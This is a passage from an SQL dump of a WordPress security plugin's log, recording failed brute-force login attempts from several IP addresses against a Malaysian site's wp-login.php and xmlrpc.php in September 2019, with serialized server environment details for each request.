empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"47758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHSXiqbKGlf1IVly7OmsAAAAUs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568789086.4818\";s:12:\"REQUEST_TIME\";s:10:\"1568789086\";}}','notice','2019-09-18 06:44:48','2019-09-18 06:44:46',17742592,19233320,'https://bintara.com.my/wp-login.php',1,0,'119.28.180.62'),(24953,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"48080\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHSYG4SfF9g@8lNlxw1swAAAEA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568789088.8933\";s:12:\"REQUEST_TIME\";s:10:\"1568789088\";}}','notice','2019-09-18 06:44:50','2019-09-18 06:44:49',18259616,19556896,'https://bintara.com.my/xmlrpc.php',1,0,'119.28.180.62'),(24954,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"33080\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHTE24SfF9g@8lNlxw11gAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568789267.4904\";s:12:\"REQUEST_TIME\";s:10:\"1568789267\";}}','notice','2019-09-18 06:47:48','2019-09-18 06:47:47',17739208,19232384,'https://bintara.com.my/wp-login.php',1,0,'162.144.123.107'),(24955,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"33778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHTFq1FqYKvioG46Y49pAAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568789270.6135\";s:12:\"REQUEST_TIME\";s:10:\"1568789270\";}}','notice','2019-09-18 06:47:51','2019-09-18 06:47:50',18258352,19557848,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.123.107'),(24956,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"55376\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHVXkQGijxhVPhG1M0ZJgAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568789854.4644\";s:12:\"REQUEST_TIME\";s:10:\"1568789854\";}}','notice','2019-09-18 06:57:36','2019-09-18 06:57:34',17741000,19229888,'https://bintara.com.my/wp-login.php',1,0,'209.15.37.34'),(24957,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"55806\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHVYa1FqYKvioG46Y4-1AAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568789857.7115\";s:12:\"REQUEST_TIME\";s:10:\"1568789857\";}}','notice','2019-09-18 06:57:39','2019-09-18 06:57:38',18259176,19556176,'https://bintara.com.my/xmlrpc.php',1,0,'209.15.37.34'),(24958,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"45424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHYq61FqYKvioG46Y5DEgAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568790699.8569\";s:12:\"REQUEST_TIME\";s:10:\"1568790699\";}}','notice','2019-09-18 07:11:41','2019-09-18 07:11:40',17740456,19231344,'https://bintara.com.my/wp-login.php',1,0,'34.76.36.242'),(24959,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"45992\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHYryR0vdvYEIduPCLgEQAAAQs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568790703.4277\";s:12:\"REQUEST_TIME\";s:10:\"1568790703\";}}','notice','2019-09-18 07:11:45','2019-09-18 07:11:43',18258368,19556328,'https://bintara.com.my/xmlrpc.php',1,0,'34.76.36.242'),(24960,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"206.189.151.204\";s:11:\"REMOTE_PORT\";s:5:\"36544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHc90QGijxhVPhG1M0b2AAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568791799.5257\";s:12:\"REQUEST_TIME\";s:10:\"1568791799\";}}','notice','2019-09-18 07:30:01','2019-09-18 07:30:00',17741096,19230992,'https://bintara.com.my/wp-login.php',1,0,'206.189.151.204'),(24961,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 